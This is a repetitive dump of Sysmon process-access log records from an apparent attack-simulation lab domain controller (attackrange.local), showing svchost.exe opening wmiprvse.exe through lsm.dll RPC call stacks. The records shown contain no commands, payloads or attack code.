10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.964{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.932{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.917{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.479{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 